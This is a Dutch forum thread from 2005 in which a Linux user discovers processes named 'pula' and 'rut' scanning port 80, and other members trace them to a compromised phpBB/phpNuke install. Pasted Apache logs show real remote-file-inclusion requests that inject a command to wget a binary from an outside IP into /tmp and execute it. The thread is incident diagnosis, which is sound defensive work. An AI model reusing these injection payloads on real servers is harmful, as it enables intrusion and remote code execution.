'pula' - Linux virus? - Linux en overige clients

donderdag 22 december 2005 15:06

Acties:

Topicstarter

Nou, ik heb het voor elkaar. Ik dacht dat met de overstap naar Linux virussen geen probleem meer zouden zijn, maar nu heb ik een programma dat zich verdacht virus-achtig gedraagt.
Ik was toevallig voor school bezig met een client/server programma en wilde even kijken wat er overgestuurd werd d.m.v. ethereal. Ik zag allemaal TCP SYN pakketjes die naar hele ip ranges achter elkaar werden verstuurd op poort 80. Firestarter gaf aan dat er zo'n 15 a 20 kbps verbruikt werd.
In firestarter bekijken welke applicatie zoveel data verstuurde ging niet: cpu load schoot omhoog en programma liep vast.

Een stukje van m'n ps -A:

code:

zeekoe@zeekoe:~$ ps -A
  PID TTY          TIME CMD
knip
13118 ?        00:00:00 sh <defunct>
13149 ?        00:00:00 pula
13150 ?        00:00:00 pula
13151 ?        00:05:47 pula
13156 ?        00:00:00 rut
13771 ?        00:00:00 sh <defunct>
14069 ?        00:00:00 rut
15792 ?        00:00:04 artsd
16512 ?        00:00:00 sh <defunct>
16514 ?        00:00:00 apache2
16663 ?        00:00:00 rut
knip
31968 ?        00:00:00 sh <defunct>
32028 ?        00:00:00 rut
knip

pula vond ik verdacht, rut ook. Toen ik killall pula deed, was het netwerkverkeer terug naar normaal. locate pula helpt niet, ook niet na updatedb. which pula laat ook niets zien. Iemand enig idee hoe ik erachter kom wat ik op m'n pc heb?
Het is trouwens Ubuntu Breezy, 100% up to date

[ Voor 3% gewijzigd door zeekoe op 22-12-2005 15:06 ]

Nieuw huis, nieuwe (verduurzamings)kansen...

donderdag 22 december 2005 15:09

Acties:

Luqq

kijk even wat dit oplevert.
find / -name pula

donderdag 22 december 2005 15:11

Acties:

Hu9o

Schokkend

sry...

[ Voor 97% gewijzigd door Hu9o op 22-12-2005 15:15 ]

>>>>>>>>>>>>>>>>>>>>>>>>>Vertel Microsoft over dit probleem <<<<<<<<<<<<<<<<<<<<<<<<<

donderdag 22 december 2005 15:15

Acties:

SambalBij

We're all MAD here

Hoeft geen virus te zijn, eerder kans dat er via een lekke service op je systeem wat is binnengekomen.
Ergens jammer dat je de processen hebt afgeschoten, nu kun je niet zoveel meer achterhalen. De procesnaam in die lijst hoeft niets te maken te hebben met de filename van de executable.
Je zou eigelijk willen weten onder welk useraccount het draait (ps aux)

Kijk in ieder geval eens naar verdachte zaken in /tmp (ls -la) en draai eens een chkrootkit

Sometimes you just have to sit back, relax, and let the train wreck itself

donderdag 22 december 2005 15:29

Acties:

wind-rider

google search geeft dit resultaat

http://vil.nai.com/vil/content/v_129154.htm (mcafee virus beschrijving)

als het is wat ik denk dathet is, is het een trojan.

volgens die site is het niet gevaarlijk, maar het is natuurlijk wel irritant

[ Voor 20% gewijzigd door wind-rider op 22-12-2005 15:32 ]

donderdag 22 december 2005 15:33

Acties:

r0b

hansmbakker schreef op donderdag 22 december 2005 @ 15:29:
google search geeft dit resultaat

http://vil.nai.com/vil/content/v_129154.htm (mcafee virus beschrijving)

als het is wat ik denk dathet is, is het een trojan.

volgens die site is het niet gevaarlijk, maar het is natuurlijk wel irritant

Infection starts with manual execution of the ELF type binary file. It shouldn't be able to activate successfully on a properly configured/updated system.

Dan moet je toch van een pc verbannen worden; als je handmatig allerlei gekke binaries gaat laden.

Maw, alhoewel de beschrijving ietwat klopt, lijkt het me niet.

TS: ps aux | grep pula, graag.

donderdag 22 december 2005 15:44

Acties:

M@rijn

Misschien ligt het aan mij maar bij elke systeem wat ik binnen mijn ssh bereik heb (dus zelfs geen eigen beheer) geeft resultaat op ps aux | grep pula...

Dom Dom Dom

Het was gewoon het resultaat van mijn eigen grep wat die terug gaf

[ Voor 24% gewijzigd door M@rijn op 22-12-2005 16:15 ]

donderdag 22 december 2005 15:44

Acties:

zeekoe

Topicstarter

zeekoe@zeekoe:/tmp$ ls -la
-rwxr--r-- 1 www-data www-data 468952 2005-12-22 02:49 pula
-rw-r--r-- 1 www-data www-data 468952 2005-12-22 02:49 pula.1
-rw-r--r-- 1 www-data www-data 468952 2005-12-22 02:49 pula.2
-rw-r--r-- 1 www-data www-data 468952 2005-12-22 02:49 pula.3
-rwxr--r-- 1 www-data www-data 34913 2005-12-22 11:08 rut
-rw-r--r-- 1 www-data www-data 34913 2005-12-22 11:08 rut.1
-rw-r--r-- 1 www-data www-data 34913 2005-12-22 11:08 rut.2
-rw-r--r-- 1 www-data www-data 34913 2005-12-22 11:08 rut.3

User is www-data dus. Het is waarschijnlijk niet dat ding van McAfee, want die is al dik een jaar oud en het bestand heeft een andere naam.

-edit- vandaar dat hij ook naar poort 80 probeerde te connecten. Hij zal via apache2 binnengekomen zijn.

[ Voor 8% gewijzigd door zeekoe op 22-12-2005 15:47 ]

Nieuw huis, nieuwe (verduurzamings)kansen...

donderdag 22 december 2005 15:47

Acties:

_JGC_

Gewoon een trojan die door lekke (PHP?) scripts op je systeem terecht zijn gekomen. Gebeurt wel vaker, is een lek in je scripts. Dat je een "veilig" OS draait, wil nog niet zeggen dat je rammelende scripts veilig zijn op dat OS.

donderdag 22 december 2005 15:49

Acties:

SambalBij

We're all MAD here

www-data is het account waar je webserver onder draait. Lijkt er dus op dat het is binnengekomen via een lek in je webserver of een daarop draaiend script. (php??)

Zoek eens in je webserver log terug naar die datum/tijd wat er is aangeroepen aan 'vage' url's

Sometimes you just have to sit back, relax, and let the train wreck itself

donderdag 22 december 2005 15:49

Acties:

Verwijderd

FYI http://www.viruslist.com/en/weblog?weblogid=176318050

donderdag 22 december 2005 16:03

Acties:

zeekoe

Topicstarter

Hmz...
ik draai lokaal een phpnuke/phpbb achtig iets. Dat zal er vast wat mee te maken hebben... ik heb eerst maar eens m'n poort 80 dichtgezet en de scripts verplaatst. Bedankt voor de reacties!
-edit-
FYI, gedeelte uit error.log:

code:

[Thu Dec 22 11:46:03 2005] [error] [client 24.148.231.58] File does not exist: /var/www/Forums
[Thu Dec 22 11:46:07 2005] [error] [client 24.148.231.58] File does not exist: /var/www/modules/coppermine
[Thu Dec 22 11:46:08 2005] [error] [client 24.148.231.58] File does not exist: /var/www/modules/coppermine
--11:46:16--  http://209.136.48.69/cbac
           => `cbac'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 107 [text/plain]

    0K                                                       100%    3.40 MB/s

11:46:27 (3.40 MB/s) - `cbac' saved [107/107]

--11:46:27--  http://209.136.48.69/pula
           => `pula'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 468,952 (458K) [text/plain]

    0K .......... .......... .......... .......... .......... 10%   26.72 KB/s
   50K .......... .......... .......... .......... .......... 21%   39.84 KB/s
  100K .......... .......... .......... .......... .......... 32%   38.89 KB/s
  150K .......... .......... .......... .......... .......... 43%   18.47 KB/s
  200K .......... .......... .......... .......... .......... 54%   16.81 KB/s
  250K .......... .......... .......... .......... .......... 65%   28.44 KB/s
  300K .......... .......... .......... .......... .......... 76%   16.10 KB/s
  350K .......... .......... .......... .......... .......... 87%   24.23 KB/s
  400K .......... .......... .......... .......... .......... 98%   21.01 KB/s
  450K .......                                               100%   33.68 KB/s

11:46:47 (23.32 KB/s) - `pula' saved [468952/468952]

--11:46:47--  http://209.136.48.69/rut
           => `rut'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34,913 (34K) [text/plain]

    0K .......... .......... .......... ....                 100%    8.28 KB/s

11:46:53 (8.28 KB/s) - `rut' saved [34913/34913]

[Thu Dec 22 12:02:55 2005] [error] [client 216.218.212.247] script '/var/www/modules/Forums/admin/admin_styles.phpadmin_styles.php' not found or unable to stat

code:

zeekoe@zeekoe:/var/log/apache2$ cat access.log |grep cbac
24.148.231.58 - - [22/Dec/2005:11:46:01 +0100] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 350 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.148.231.58 - - [22/Dec/2005:11:46:02 +0100] "GET /admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.148.231.58 - - [22/Dec/2005:11:46:03 +0100] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.148.231.58 - - [22/Dec/2005:11:46:07 +0100] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.148.231.58 - - [22/Dec/2005:11:46:08 +0100] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
(enzovoorts...)

[ Voor 95% gewijzigd door zeekoe op 22-12-2005 16:41 ]

Nieuw huis, nieuwe (verduurzamings)kansen...

donderdag 22 december 2005 16:55

Acties:

r0b

Een lekke phpnuke dus.

[ Voor 26% gewijzigd door r0b op 22-12-2005 16:55 ]

vrijdag 23 december 2005 13:21

Acties:

_JGC_

Scripts verplaatsen gaat je niet helpen: die gekken sporen gewoon lekke phpbb installaties op met google en hacken het ding dan alsnog.

vrijdag 23 december 2005 14:35

Acties:

Verwijderd

_JGC_ schreef op vrijdag 23 december 2005 @ 13:21:
Scripts verplaatsen gaat je niet helpen: die gekken sporen gewoon lekke phpbb installaties op met google en hacken het ding dan alsnog.

Wat enigzinds op te vangen is door goed gebruik van robots.txt (googlebot respecteerd deze). Voor de rest, tijd voor een reinstall

zaterdag 24 december 2005 01:14

Acties:

Verwijderd

Ik heb vanmiddag trouwens nog de gratis antivir (http://www.antivir.com) linux versie onrdekt echt een topper

Mischien dat je daar wat aan hebt in de toekomst

zaterdag 24 december 2005 11:23

Acties:

Mac_Cain13

Verwijderd schreef op zaterdag 24 december 2005 @ 01:14:
Ik heb vanmiddag trouwens nog de gratis antivir (http://www.antivir.com) linux versie onrdekt echt een topper

Mischien dat je daar wat aan hebt in de toekomst

Een virusscanner is natuurlijk lang niet gek. Al was het maar om de Windows-mensen die files van je downloaden te beschermen, maar wel een lapmiddel. Je moet natuurlijk in eerste instantie wel zorgen dat je configuratie goed is en dat je scripts niet lek zijn. Anders werkt het nog niet lekker.

En vergeet natuurlijk de opensource virusscanner Clamav niet!